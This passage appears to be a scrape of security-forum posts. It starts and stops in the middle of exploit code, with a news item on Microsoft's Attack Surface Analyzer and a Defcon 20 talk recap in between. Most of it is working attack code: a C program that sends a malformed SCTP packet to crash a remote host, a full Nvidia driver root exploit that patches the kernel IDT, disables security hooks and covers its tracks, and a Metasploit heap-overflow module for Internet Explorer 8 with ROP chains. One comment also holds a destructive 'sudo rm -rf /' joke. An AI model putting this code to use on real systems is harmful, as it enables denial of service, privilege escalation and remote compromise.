gethostbyname(argv[1]); if(!hp) { printf("[*] couldn't resolve %s\n\n", argv[1]); return -1; } memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = htons(atoi(argv[2])); memcpy((char *)&sin.sin_addr, hp->h_addr, hp->h_length); crash = malloc(20000); if(!crash) { printf("\n[*] couldn't allocate memory\n"); return -1; } printf("[*] building crash packet..\n"); memset(crash, 0x00, 20000); /* fill in IP header */ iph = (struct ip *)crash; iph->ip_hl = 5; iph->ip_v = 4; iph->ip_tos = 0; iph->ip_len = 0; /* fill in later when we know... */ iph->ip_id = htons(1337); iph->ip_off = 0; iph->ip_ttl = 250; iph->ip_p = 132; /* sctp */ iph->ip_sum = 0; iph->ip_src.s_addr = inet_addr("1.3.3.7"); iph->ip_dst.s_addr = sin.sin_addr.s_addr; /* fill in SCTP header */ sctph = (void *)crash + sizeof(struct ip); sctph->sport = htons(0x1234); sctph->dport = htons(atoi(argv[2])); sctph->vtag = htonl(0x12345); /* deliberately wrong */ sctph->csum = 0; /* build AUTH chunk */ auth_chunk = (void *)crash + sizeof(struct ip) + sizeof(struct sctphdr); auth_chunk->ch.type = SCTP_AUTH; auth_chunk->ch.length = htons(8 + sizeof(struct sctp_auth_chunk)); auth_chunk->hmac_id = htons(0x1337); memset((void *)auth_chunk->hmac, 0x61, 8); /* build ASCONF chunk */ asconf_chunk = (void *)crash + sizeof(struct ip) + sizeof(struct sctphdr) + sizeof(struct sctp_auth_chunk) + 8; asconf_chunk->ch.type = SCTP_ASCONF; asconf_chunk->ch.length = htons(sizeof(struct sctp_asconf_chunk) + sizeof(struct sctp_ipv4addr_param)); asconf_chunk->serial = 0x41414141; /* whatever */ ipv4_addr = (void *)crash + sizeof(struct ip) + sizeof(struct sctphdr) + sizeof(struct sctp_auth_chunk) + 8 + sizeof(struct sctp_asconf_chunk); ipv4_addr->ph.length = htons(sizeof(struct sctp_ipv4addr_param)); ipv4_addr->ph.type = htons(0x0005); ipv4_addr->addr = INADDR_ANY; /* this takes us down the bad code path */ /* what's the length of the whole packet? */ iph->ip_len = sizeof(struct ip) + sizeof(struct sctphdr) + sizeof(struct sctp_auth_chunk) + 8 + sizeof(struct sctp_asconf_chunk) + sizeof(struct sctp_ipv4addr_param); /* calculate IP checksum */ iph->ip_sum = checksum((unsigned short *)crash, iph->ip_len >> 1); /* calculate SCTP checksum */ sctph->csum = htonl(sctp_crc32c((const unsigned char *)sctph, sizeof(struct sctphdr) + sizeof(struct sctp_auth_chunk) + 8 + sizeof(struct sctp_asconf_chunk) + sizeof(struct sctp_ipv4addr_param))); printf("[*] sending packet..\n\n"); /* send the bad packet */ ret = sendto(sock, crash, iph->ip_len, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)); if(ret < 0) { printf("[*] error sending packet\n"); return -1; } printf("[*] done, bad packet sent!\n\n"); free(crash); close(sock); return 0; } Sursa

Attack Surface Analyzer Helps Developers During the Verification Phase of the Microsoft Security Development Lifecycle (SDL) Microsoft has released the public version of Attack Surface Analyzer, a tool that determines the security of an application by examining how it affects the computer it is installed on. Microsoft originally released Attack Surface Analyzer as a public beta in January 2011 during the Blackhat DC security conference. In the year and a half since, the company has reduced the number of false positives, enhanced performance, and made bug fixes, Monty LaRue and Jimmie Lee, Trustworthy Computing Security engineers at Microsoft, wrote on the Security Development Lifecycle blog Thursday. Attack Surface Analyzer 1.0 now has an improved graphical user interface and in-depth documentation, they wrote. The verification tool is designed to help software developers and independent software vendors assess the attack surface of an application or software platform, Tim Rains, director of Microsoft's Trustworthy Computing group, wrote on the Microsoft Security Blog Thursday. Developers and testers can use this to determine if their applications are secure. Since ASA doesn't require the original source code, managers and executives can also use the tool to determine how a new application or software being considered would affect the organization's overall security before deploying it. "IT Security Auditors can use the tool to evaluate the risk of a particular piece of software installed on the Windows platform during threat risk reviews," Rains wrote. http://www.securityweek.com/sites/default/files/Attack-Surface%20Analyzer.jpg The tool takes snapshots of the system before and after an application was installed, and compares them to identify changes made when new applications were installed. A stand-alone wizard guides users through the scanning and analysis process and a command-line version is available for use with automated tools. The tool also gives an overview of changes to the system that Microsoft considers important to the security of the platform, and it highlights these changes in the attack surface report, LaRue and Lee wrote. The tool analyzes changed or newly added files, registry keys, services, ActiveX Controls, listening ports, access control lists and other parameters. Analyzer does not appear to rely on signatures or try to exploit known vulnerabilities. Instead, it just looks at classes of security weaknesses where programs commonly fall short, or are exposed to attack vectors. The “Security Issues” tab on the highlights specific potential issues such as access control lists (ACLs) that could be problematic. As part of the Software Development Lifecycle to encourage secure software development, Microsoft requires developers to run attack surface validations before releasing Windows applications. The Analyzer provides an overview of the changes so that the development team can define the product's default and maximum attack surface, as required by the SDL. Sursa

After https://rstcenter.com/forum/56501-defcon-20-day-1-review.rst .. Defcon 20 Day 2 The talks on Defcon day 2 were scheduled to begin from 10 am. I reached the venue at 8:30 am and decided to use the time to buy some Defcon merchandise. The lines for the merchandise are usually very long but it wasn’t at that time of the day. After buying a Defcon T-shirt, i decided to go to the room where the CTF contest was being held. The room was already filled with participants who were just setting up their systems for the contest. Here are some pics of the contests hall where some of the events like Bro CTF, gaming events etc were being held. And there was also the very famous Wall of Sheep. Making Sense of Static – New tools for hacking GPS This talk was mainly focussed on explaining how the GPS works and introduced some of the new tools for GPS hacking. The talk was mainly divided into three parts a) Why is GPS interesting for hacking. GPS 101 and c) New tools for hacking GPS. The speakers started by explaining that these days there are a lot of GPS devices being used and hence a lot of techniques have been developed for performing spoofing and jamming attacks. They then gave a very detailed description about GPS, how the geolocation information is being determined by locating the distance from the satellites and all the other technical aspects related to it.In the end, the speakers introduced two new GPS hacking tools named Libswiftnav and Piksi. Drones The speaker Chris Anderson starts by telling how the vast amount of technology required to create Drones is already available to the public for a very cheap amount. He then tells about how he once started a community DIY drones dedicated to created drones. Over the past 5 years, it has transformed into the largest amateur UAV community on the web. He then explains that the success of this was because of the support from the community and the use of Open source hardware and software. DIY Drones has been able to create thousands of Unmanned aerial vehicles at a cost of as less as 1% than the cost of the equivalent military drones. He then explains about the challenges that he faced while creating the community. He tells about his plan to make these drones available to the public at a good price and the legal challenges that he is going to face while doing this. He also explains how by doing this the community can actually help them improve their product. He explains about his plan to compete with some of the aerospace industries. Can You Track Me Now? Government And Corporate Surveillance Of Mobile Geo-Location Data This was a panel discussion by Christopher Soghoian, Ben Wizner, Catherine Crump and Ashkan Soltani. The speakers tell about the investigation they have done on how the government is utilizing geolocation data of regular users via their mobile devices. The speakers first start by explaining about some of the local and network attacks which could lead to disclosure of geolocation information. These could be local caches stored on their phone or through third party apps which disclose the user’s geolocation information. In some cases, the photos in the device and are available to the third party apps and these photos could sometimes contain geolocation information. They explain about how the carriers companies are forced by the government to reveal the location data of their customers. This geolocation information could be of different types for e.g real time GPS data, historical data or triangulated data. They explain how the carrier companies have built web portals which allow government to track the users while sitting at their office. They also explain that encrypting information on a mobile device doesn’t server the purpose as Apple and Google (which are the two major manufacturers of mobile OS) can undo the encryption if needed by the government. A lot of innocent citizens are subjected to surveillance and they don’t even know about it. They also explain how the laws for protecting user’s privacy are outdated and are not up to pace with the technology. The speakers finally conclude by saying that the least these carries companies can do is inform the users if their private information is being looked into. New techniques in SQLi obfuscation The speaker Nick Galbreath discusses about some of new techniques of hiding SQL injection from WAF’s. He first starts by introducing Libinjection which is a quasi-SQL tokenizer and parser to detect SQL injection. He then explains how he tested it with a very large number of Sql injection attacks and noted that some of the code in WAF’s was never even executed. He explains how he walked through some of the dark corners of different languages like MySql, PGSql, Oracle looing for different kinds of syntax. He starts by explaining about the NULL character. NULL in MySQL an be written as \N, whereas \n means a new line. This means any WAF that does a to_lower on the user input and looks for null will miss this test case. He then explains about some of the unique Postgres functions that might slip through WAF’s too. He explains that because of so much of syntax available and because of the ability to write things in different formats, it becomes tough to write a regular expression to detect SQL injection. He continues the discussion by talking about some oracle special literals, hexadecimal literals . binary literals, money Literals. comments, strings etc and how their syntax can be used to get through WAF. He finally concludes the talk by talking about his intention to add more parsing support for libinjection. Divashark The speaker talks about a new tool named Divashark he has been working on. He starts by telling that the inspiration behind this work came from the Defcon Capture the Packet contest where contestants use Wireshark filters to get the information they need. Divashark is an application which assists in live network traffic analysis. He explains how Wireshark can sometimes contain too much information, and if someone is looking for high level information like username and password, then it becomes a very tedious task. He tells that Divashark has the capability to follow tcp and udp streams and group them together. It also has some Protocol dissectors which are designed to get you the information that you want. He finally concludes by telling that the user interface isn’t ready yet but should be available soon. Here are some other pictures from Defcon day 2 Original Article

^ iar reînvia?i topicuri vechi.. chiar de proxy-uri nu pute?i face rost?

Nvidia Linux Driver Privilege Escalation /* Anonymous * * How to use: sudo rm -rf / * * greetz: djrbliss, kad, Ac1dB1tch3z, nVidia! * * Only complete fix patch nvidia drivers and redefine * IS_BLACKLISTED_REG_OFFSET: #define IS_BLACKLISTED_REG_OFFSET(nv, offset, length) 1 */ #define _GNU_SOURCE #include <fcntl.h> #include <sys/sysinfo.h> #include <stdint.h> #include <inttypes.h> #include <stdarg.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/wait.h> #include <sys/socket.h> #include <linux/netlink.h> #include <linux/inet_diag.h> #include <string.h> #include <sys/mman.h> #include <errno.h> #include <netinet/in.h> #include <dirent.h> #ifdef __x86_64__ #define KERNEL_BASE 0xffffffff80000000L #else #define KERNEL_BASE 0xc0000000 #endif #define ENTRY 0xdc #define inline __attribute__((always_inline)) #ifdef __x86_64__ #define __kernel #else #define __kernel __attribute__((regparm(3))) #endif #define __used __attribute((used)) static unsigned long kernel_ofs_phys; static volatile uint32_t *cve_2012_YYYY; static void poke_byte(volatile uint32_t *m, uint32_t ofs, uint8_t val) { uint32_t i = (ofs & 3) * 8; ofs >>= 2; m[ofs] = (m[ofs] & ~(0xff << i)) | (val << i); } static void physread16(volatile uint32_t *m, uint32_t target, uint32_t *buffer) { if (1) { uint32_t ofs = (target & 0x3ffff)/4, i; if (target & 0xf) { printf("[ ] Function requires 16-byte alignment for input!\n"); exit(-1); } cve_2012_YYYY[0xf00/4] = 0xb | ((target >> 18) << 10); memset(buffer, 0, 16); for (i = 0; i < 4; ++i) { uint32_t shift = i * 8; poke_byte(cve_2012_YYYY, 0x204, i); buffer[0] |= (m[ofs/4] & 0xff) << shift; buffer[1] |= ((m[ofs/4] & 0xff00) >> 8) << shift; buffer[2] |= ((m[ofs/4] & 0xff0000) >> 16) << shift; buffer[3] |= ((m[ofs/4] & 0xff000000) >> 24) << shift; } } } static void physwrite16(volatile uint32_t *m, uint32_t target, uint32_t *buffer) { if (1) { uint32_t i, ofs = (target & 0x3ffff)/4; if (target & 0xf) { printf("[ ] Function requires 16-byte alignment for output!\n"); exit(-1); } cve_2012_YYYY[0xf00/4] = 0xb | ((target >> 18) << 10); for (i = 0; i < 4; ++i) { int shift = 8 * i; uint32_t val; poke_byte(cve_2012_YYYY, 0x102, 1<<i); val = (buffer[0] >> shift) & 0xff; val |= ((buffer[1] >> shift) & 0xff) << 8; val |= ((buffer[2] >> shift) & 0xff) << 16; val |= ((buffer[3] >> shift) & 0xff) << 24; m[ofs/4] = val; } } } unsigned long virt2phys(unsigned long addr) { unsigned long phys; addr &= ~KERNEL_BASE; addr += kernel_ofs_phys; phys = addr & 0xffffffff; return phys; } // dest has to be 16-byte and slightly larger for unaligned reads void *kernel_read(volatile uint32_t *m, void *dest, unsigned long src, unsigned long len) { uint32_t rem, phys = virt2phys(src); void *ret = dest + (src & 0xf); rem = (-phys) & 0xf; if (rem) { physread16(m, phys & ~0xf, dest); dest += 0x10; phys += rem; if (len > rem) len -= rem; else len = 0; } for (; len; phys += 0x10, dest += 0x10, len -= len >= 16 ? 16 : len) physread16(m, phys, dest); return ret; } void kernel_write(volatile uint32_t *m, unsigned long dest, unsigned long src, unsigned long len) { uint32_t phys; unsigned long remaining, towrite, i; phys = virt2phys(dest); if (!m || m == MAP_FAILED) puts("not actually writing..."); if (1) { remaining = len; for (i = 0; i < len; i += 16) { uint32_t buffer[4]; if (remaining < 16) physread16(m, phys + i, (uint32_t*)buffer); towrite = remaining > 16 ? 16 : remaining; memcpy(buffer, (void*)(src + i), towrite); physwrite16(m, phys + i, (uint32_t*)buffer); remaining -= 16; } } } static void mode_x(volatile uint32_t *x) { // http://wiki.osdev.org/VGA_Hardware Mode X // 3c0 x[0x310/4] = 0x000f0041; x[0x314/4] = 0; // 3c2 x[0x000/4] = 0xe3; // 3c4 x[0x100/4] = 0x000f0103; x[0x104/4] = 0x06; // 3ce x[0x204/4] = 0x0f054000; // 3d4 x[0x400/4] = 0x82504f5f; x[0x404/4] = 0x3e0d8054; poke_byte(x, 0x408, 0); poke_byte(x, 0x409, 0x41); x[0x410/4] = 0x28dfacea; x[0x414/4] = 0xe306e700; } static int dirfilter(const struct dirent *d) { return d->d_type == DT_LNK && strchr(d->d_name, ':'); } static int nvidia_fd(uint64_t *res) { struct dirent **list; int fd, resfd, ret; char buf[256]; ret = scandir("/sys/bus/pci/drivers/nvidia", &list, dirfilter, versionsort); if (ret <= 0) goto fail; sprintf(buf, "/sys/bus/pci/drivers/nvidia/%s/resource", list[0]->d_name); resfd = open(buf, O_RDONLY); if (resfd < 0) goto fail; read(resfd, buf, sizeof(buf)); *res = strtoll(buf, NULL, 16); close(resfd); if ((fd = open("/dev/nvidia0", O_RDWR)) < 0) goto fail; return fd; fail: perror("COULD NOT DO SUPER SECRET HACKING STUFF, YOU ARE ON YOUR OWN!"); *res = 0; return -1; } volatile uint32_t *nvidia_handle(int fd, uint64_t res) { // access 4 bytes at a time or things go weird volatile uint32_t *m; if (fd < 0) return MAP_FAILED; // I HAD TO LEARN VGA FOR THIS m = cve_2012_YYYY = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, fd, res + 0x619000); if (m != MAP_FAILED) { if ((m[0xf00/4] & 8) && (m = mmap(NULL, 0x10000, PROT_READ|PROT_WRITE, MAP_SHARED, fd, res + 0xa0000)) != MAP_FAILED) { printf("[*] CVE-2012-YYYY\n"); mode_x(cve_2012_YYYY); // put into vga mode x, ish return m; } munmap((void*)cve_2012_YYYY, 0x1000); m = cve_2012_YYYY = MAP_FAILED; } return m; } static int tasknamelen; static char taskname[64]; extern long gettask(void); extern long testgetroot(void); __used __kernel extern long callsetroot(long uid, long gid); #define FN(x) ".globl " x "\n\t.type " x ",@function\n\t" x ":\n\t.cfi_startproc\n\t" #define END ".cfi_endproc\n\t" asm( ".text\n\t.align 4\n\t" FN("testgetroot") // AND HAVE FUN! #ifdef __x86_64__ "swapgs\n\t" "call getroot\n\t" "swapgs\n\t" "iretq\n\t" #else "mov %fs, %edi\n\t" "mov $0xd8, %esi\n\t" "mov %esi, %fs\n\t" "call getroot\n\t" "mov %edi, %fs\n\t" "iretl\n\t" #endif END FN("gettask") #ifdef __x86_64__ // Grab some offsets from system_call "mov $0xc0000082, %ecx\n\t" "rdmsr\n\t" "movslq %eax, %rax\n\t" // Fuck optional alignment, fix it by looking for // the start prefix of our lovely mov %gs:.. in system_call we just found // this will get us kernel_stack, in which most cases it means that // our current_task is right below it // This is only needed if kallsyms fails "1:\n\t" "cmpw $0x4865, 0x3(%rax)\n\t" "je 2f\n\t" "incq %rax\n\t" "jmp 1b\n\t" "2:\n\t" "movl 17(%rax), %edx\n\t" // blegh padding "3:\n\t" "addl $8, %edx\n\t" "movq %gs:(%edx), %rax\n\t" "test %eax, %eax\n\t" "jz 3b\n\t" "cmpl $-1, %eax\n\t" "je 3b\n\t" #else // TODO: maybe.. "xor %eax, %eax\n\t" #endif "ret\n\t" END #define S2(x) #x #define S1(x) S2(x) FN("callsetroot") #ifdef __x86_64__ "int $" S1(ENTRY) "\n\t" #else "push %edi\n\t" "push %esi\n\t" "int $" S1(ENTRY) "\n\t" "pop %esi\n\t" "pop %edi\n\t" #endif "ret\n\t" END ".previous"); struct kallsyms { unsigned long *addresses; unsigned long num_syms; unsigned char *names; unsigned long *markers; unsigned char *token_table; unsigned short *token_index; }; // Memory layout kallsyms, all pointer aligned: // unsigned long addresses[num_kallsyms] // unsigned long num_kallsyms // unsigned char names[..] // unsigned long markers[(num_kallsyms + 0xff) >> 8] = { 0, ... } // char token_table[var...] = { null terminated strings } // unsigned short token_index[var?...] = { 0, ... }; // This should probably work for 64-bits and 32-bits kernels // But only tested on 64-bits kernels inline static long init_kallsyms(struct kallsyms *ks) { unsigned long start = KERNEL_BASE + 0x1000000L; unsigned long *max = (void*)KERNEL_BASE + 0x2000000L; unsigned long *cur; for (cur = (void*)start; cur < max; cur += 2) { if (*cur == start && (cur[1] == start || cur[-1] == start)) goto unwind; } return -1; unwind: while ((cur[0] & KERNEL_BASE) == KERNEL_BASE) cur++; ks->addresses = cur - *cur; ks->num_syms = *(cur++); ks->names = (unsigned char*)cur; do { cur++; } while (*cur); ks->markers = cur; cur += (ks->num_syms + 0xff) >> 8; ks->token_table = (unsigned char*)cur; // Zero terminated string can create padding that could // be interpreted as token_index, requiring the || !*cur do { cur++; } while (*(unsigned short*)cur || !*cur); ks->token_index = (unsigned short*)cur; return (long)ks->num_syms; } #define KSYM_NAME_LEN 128 inline static int kstrcmp(const char *x, const char *y) { for (;*x == *y; x++, y++) if (!*x) return 0; return -1; } /* * kallsyms.c: in-kernel printing of symbolic oopses and stack traces. * * Rewritten and vastly simplified by Rusty Russell for in-kernel * module loader: * Copyright 2002 Rusty Russell <rusty@rustcorp.com.au> IBM Corporation * * ChangeLog: * * (25/Aug/2004) Paulo Marques <pmarques@grupopie.com> * Changed the compression method from stem compression to "table lookup" * compression (see scripts/kallsyms.c for a more complete description) */ inline static unsigned int kallsyms_expand_symbol(struct kallsyms *ks, unsigned int off, char *result) { int len, skipped_first = 0; const unsigned char *tptr, *data; /* Get the compressed symbol length from the first symbol byte. */ data = &ks->names[off]; len = *data; data++; /* * Update the offset to return the offset for the next symbol on * the compressed stream. */ off += len + 1; /* * For every byte on the compressed symbol data, copy the table * entry for that byte. */ while (len) { tptr = &ks->token_table[ks->token_index[*data]]; data++; len--; while (*tptr) { if (skipped_first) { *result = *tptr; result++; } else skipped_first = 1; tptr++; } } *result = '\0'; /* Return to offset to the next symbol. */ return off; } inline static unsigned long kdlsym(struct kallsyms *ks, char *name) { char namebuf[KSYM_NAME_LEN]; unsigned long i; unsigned int off; for (i = 0, off = 0; i < ks->num_syms; i++) { off = kallsyms_expand_symbol(ks, off, namebuf); if (kstrcmp(namebuf, name) == 0) return ks->addresses[i]; } return 0; } __used __kernel long getroot(long uid, long gid) { int i; unsigned long cred; int *j = NULL; int k; char *p; struct kallsyms ks; unsigned long task_struct = 0; long ret = init_kallsyms(&ks); if (ret > 0) { void (*fn)(void); __kernel void *(*fn1)(void*); unsigned long task_offset; char fnops[] = "reset_security_ops"; char fntask[] = "current_task"; char fncred[] = "get_task_cred"; // SELINUX is overrated.. fn = (void*)kdlsym(&ks, fnops); if (fn) fn(); // Get a more reliable offset to current_task if we can task_offset = kdlsym(&ks, fntask); if (task_offset) #ifdef __x86_64__ asm("mov %%gs:(%1), %0" : "=r"(task_struct) : "r"(task_offset)); #else asm("mov %%fs:(%1), %0" : "=r"(task_struct) : "r"(task_offset)); #endif else task_struct = gettask(); if (!task_struct) return -4; fn1 = (void*)kdlsym(&ks, fncred); if (fn1) { j = fn1((void*)task_struct); // And decrease refcount we just increased asm("lock; decl (%0)" :: "r"(j)); } } else if (!ret) task_struct = gettask(); else return -ret; if (!task_struct) return -5; // No kallsyms or no get_task_cred, manually try to find if (!j) { // all the creds are belong to us for (i = 0; i < 0x1000; i += sizeof(void*)) { p = (char *)(task_struct + i); for (k = 0; k < tasknamelen; k++) { if (p[k] != taskname[k]) break; } if (k == tasknamelen) { cred = *(unsigned long *)((unsigned long)p - sizeof(unsigned long) * 2); j = (int *)cred; break; } } if (!j) return -1; } for (i = 0; i < 1000; i++, j++) { if (j[0] == uid && j[1] == uid && j[2] == uid && j[3] == uid && j[4] == gid && j[5] == gid && j[6] == gid && j[7] == gid) { /* uid, euid, suid, fsuid */ j[0] = j[1] = j[2] = j[3] = 0; /* gid, egid, sgid, fsgid */ j[4] = j[5] = j[6] = j[7] = 0; /* ALLCAPS!!111 */ j[10] = j[11] = 0xffffffff; j[12] = j[13] = 0xffffffff; j[14] = j[15] = 0xffffffff; return 0; } } return -2; } struct gdt { uint16_t limit; uint32_t base; }__attribute__((packed)); static unsigned long getidt() { struct gdt idt; memset(&idt, 0x00, sizeof(struct gdt)); asm volatile("sidt %0" : "=m"(idt)); return idt.base | 0xFFFFFFFF00000000UL; } typedef struct gate_struct { uint16_t offset_low; uint16_t segment; unsigned ist : 3, zero0 : 5, type : 5, dpl : 2, p : 1; uint16_t offset_middle; #ifdef __x86_64__ uint32_t offset_high; uint32_t zero1; #endif } __attribute__((packed)) gate_desc; enum { GATE_INTERRUPT = 0xE, GATE_TRAP = 0xF, GATE_CALL = 0xC, GATE_TASK = 0x5, }; #define YES_PLEASE 3 #define PTR_LOW(x) ((unsigned long)(x) & 0xFFFF) #define PTR_MIDDLE(x) (((unsigned long)(x) >> 16) & 0xFFFF) #define PTR_HIGH(x) ((unsigned long)(x) >> 32) #ifdef __x86_64__ #define __KERNEL_CS 0x10 #else #define __KERNEL_CS 0x60 #endif void dump_gate(gate_desc *gate) { #if 0 uint16_t *p = (void *)gate; unsigned i; for (i = 0; i < sizeof(*gate) / sizeof(uint16_t); i++) printf("%04x\n", *p++); #endif } void dump_bytes(void *desc) { int i; for (i = 0; i < 16; ++i) { printf("%02x", ((char*)desc)[i]); if (i < 15 && (i % 4) == 3) printf(" "); } printf("\n"); } static inline void pack_gate(gate_desc *gate, unsigned type, unsigned long func, unsigned dpl, unsigned ist, unsigned seg) { gate->offset_low = PTR_LOW(func); gate->offset_middle = PTR_MIDDLE(func); gate->segment = seg; gate->ist = ist; gate->p = 1; gate->dpl = dpl; gate->zero0 = 0; gate->type = type; #ifdef __x86_64__ gate->offset_high = PTR_HIGH(func); gate->zero1 = 0; #endif dump_gate(gate); } // Test mode, not really an exploit, although it does // show the option to forbid physical memory is useless static int devmem_fd(void) { int fd = open("/dev/mem", O_RDWR|O_SYNC); if (fd < 0) perror("/dev/mem"); return fd; } void *xalloc(unsigned long len) { void *ret = NULL; posix_memalign(&ret, 16, ((len+0xf)&~0xf) + 16); return ret; } void xfree(void *ptr) { free((void*)((unsigned long)ptr & ~0xfL)); } int main(int argc, char * argv[]) { volatile uint32_t *handle = NULL; long ret, i, found = 0; char *p; gate_desc gate, gate2[16/sizeof(gate_desc)]; uint32_t buf[4]; gate_desc *dp = (gate_desc*)buf; uint8_t data[256]; uint64_t res = 0; printf("[*] IDT offset at %#lx\n", getidt()); // syntax: --dumpmem BAR0, for debugging "cant find my kernel" issues as root if (argc > 2 && (!strcmp(argv[1], "-d") || !strcmp(argv[1], "--dumpmem"))) { res = strtoll(argv[2], NULL, 16); handle = nvidia_handle(devmem_fd(), res); for (i = 0; i < 0x4000000; i += 16) { physread16(handle, i, (void*)data); write(2, data, 16); } return 0; } else if (argc > 1 && (res = strtoll(argv[1], NULL, 16))) { handle = nvidia_handle(devmem_fd(), res); if (!getuid()) { setgid(1000); setuid(1000); } if (handle == MAP_FAILED) return -1; printf("[*] Dry run with /dev/mem as uid %u gid %u...\n", getuid(), getgid()); } if ((p = strchr(argv[0], '/'))) p++; else p = argv[0]; strcpy(taskname, p); tasknamelen = strlen(taskname); if (!handle || handle == MAP_FAILED) { uint64_t res; int fd = nvidia_fd(&res); printf("[*] Abusing nVidia...\n"); handle = nvidia_handle(fd, res); if (!handle || handle == MAP_FAILED) return -1; } // X86_OF_ENTRY unsigned long idtentry = getidt() + (2*sizeof(unsigned long)*4); pack_gate(&gate, GATE_INTERRUPT, KERNEL_BASE, YES_PLEASE, 0, __KERNEL_CS); for (i = 0; i < 256; ++i) { kernel_ofs_phys = i * 1024 * 1024; physread16(handle, virt2phys(idtentry), buf); // Copy offsets since we don't really care about them gate.offset_low = dp->offset_low; gate.offset_middle = dp->offset_middle; #ifndef __x86_64__ gate.segment = dp->segment; if (*(uint64_t*)&dp[1] == 0x00000000ffffffffULL) { printf("[X] 64-bits kernel found at ofs %lx\n", kernel_ofs_phys); printf("[X] Compiled for 32-bits only\n"); continue; } #endif if (!memcmp(&gate, dp, sizeof(*dp))) { printf("[*] %zu-bits Kernel found at ofs %lx\n", sizeof(void*)*8, kernel_ofs_phys); found = 1; break; } } if (!found) { printf("[X] No kernel found! >\n"); return -1; } idtentry = getidt() + (2*sizeof(unsigned long)*ENTRY); printf("[*] Using IDT entry: %d (%#lx)\n", ENTRY, idtentry); physread16(handle, virt2phys(idtentry), buf); dump_gate(dp); printf("[*] Enhancing gate entry...\n"); pack_gate(&gate, GATE_INTERRUPT, (uintptr_t)&(testgetroot), YES_PLEASE, 0, __KERNEL_CS); kernel_write(handle, idtentry, (unsigned long)&gate, sizeof(gate)); physread16(handle, virt2phys(idtentry), (uint32_t*)gate2); if (memcmp(&gate, gate2, sizeof(gate))) { printf("[ ] Failed!\n"); return -1; } printf("[*] Triggering payload...\n"); ret = callsetroot(getuid(), getgid()); // And restore old one, I'm kind like that printf("[*] Hiding evidence...\n"); kernel_write(handle, idtentry, (unsigned long)dp, sizeof(*dp)); if (ret) printf("callsetroot returned %lx (%li)\n", ret, ret); if (getuid()) { printf("[*] Failed to get root.\n"); return -1; } printf("[*] Have root, will travel..\n"); execl("/bin/bash", "sh", NULL); perror("/bin/bash"); return 1; } Sursa

Microsoft Internet Explorer Fixed Table Col Span Heap Overflow ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_name => OperatingSystems::WINDOWS, :ua_minver => "8.0", :ua_maxver => "8.0", :rank => NormalRanking, # reliable memory corruption :javascript => true }) def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Internet Explorer Fixed Table Col Span Heap Overflow', 'Description' => %q{ This module exploits a heap overflow vulnerability in Internet Explorer caused by an incorrect handling of the span attribute for col elements from a fixed table, when they are modified dynamically by javascript code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alexandre Pelletier', # Vulnerability analysis 'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module 'binjo', # Metasploit module 'sinn3r', # Help with the Metasploit module 'juan' # Help with the Metasploit module ], 'References' => [ [ 'CVE', '2012-1876' ], [ 'OSVDB', '82866'], [ 'BID', '53848' ], [ 'MSB', 'MS12-037' ], [ 'URL', 'http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3 with msvcrt ROP', { 'Rop' => :msvcrt } ], [ 'IE 8 on Windows 7 SP1', { 'Rop' => :jre } ] ], 'Privileged' => false, 'DisclosureDate' => 'Jun 12 2012', 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' if agent =~ /NT 5\.1/ and agent =~ /MSIE 8/ return targets[1] #IE 8 on Windows XP SP3 elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/ return targets[2] #IE 8 on Windows 7 with JRE else return nil end end def junk(n=4) return rand_text_alpha(n).unpack("V").first end def nop return make_nops(4).unpack("V").first end def get_payload(t) code = payload.encoded # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") exec_size = code.length rop = [ 0x77c4ec01, # retn 0x77c4ec00, # pop ebp; retn 0x77c15ed5, # xchg eax,esp; retn (pivot) 0x77c4e392, # pop eax; retn 0x77c11120, # <- *&VirtualProtect() 0x77c2e493, # mov eax, dword ptr ds:[eax]; pop ebp; retn junk, 0x77c2dd6c, 0x77c4ec00, # pop ebp; retn 0x77c35459, # ptr to 'push esp; ret' 0x77c47705, # pop ebx; retn exec_size, # ebx 0x77c3ea01, # pop ecx; retn 0x77c5d000, # W pointer (lpOldProtect) (-> ecx) 0x77c46100, # pop edi; retn 0x77c46101, # rop nop (-> edi) 0x77c4d680, # pop edx; retn 0x00000040, # newProtect (0x40) (-> edx) 0x77c4e392, # pop eax; retn nop, # nops (-> eax) 0x77c12df9 # pushad; retn ].pack("V*") when :jre print_status("Using JRE ROP") exec_size = code.length rop = [ 0x7c346c0b, # retn 0x7c36f970, # pop ebp; retn 0x7c348b05, # xchg eax,esp; retn (pivot) 0x7c36f970, # pop ebp; retn [MSVCR71.dll] 0x7c36f970, # skip 4 bytes [MSVCR71.dll] 0x7c34373a, # pop ebx ; retn [MSVCR71.dll] exec_size, # ebx 0x7c3444d0, # pop edx ; retn [MSVCR71.dll] 0x00000040, # 0x00000040-> edx 0x7c361829, # pop ecx ; retn [MSVCR71.dll] 0x7c38f036, # &Writable location [MSVCR71.dll] 0x7c342766, # pop edi ; retn [MSVCR71.dll] 0x7c346c0b, # retn (rop nop) [MSVCR71.dll] 0x7c350564, # pop esi ; retn [MSVCR71.dll] 0x7c3415a2, # jmp [eax] [MSVCR71.dll] 0x7c3766ff, # pop eax ; retn [MSVCR71.dll] 0x7c37a151, # ptr to &VirtualProtect() - 0x0ef [IAT msvcr71.dll] 0x7c378c81, # pushad # add al,0ef 